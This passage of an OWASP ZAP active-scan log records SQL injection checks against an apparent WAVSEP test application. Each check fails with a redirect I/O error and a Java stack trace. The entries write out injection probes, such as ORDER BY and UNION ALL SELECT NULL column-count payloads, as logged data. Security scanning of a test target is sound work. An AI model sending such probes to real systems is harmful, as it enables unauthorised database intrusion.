org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681378 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681379 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681379 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 2781-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') ORDER BY 2781-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681381 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681381 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681382 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681382 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681384 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681384 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681385 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681386 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681387 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681387 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 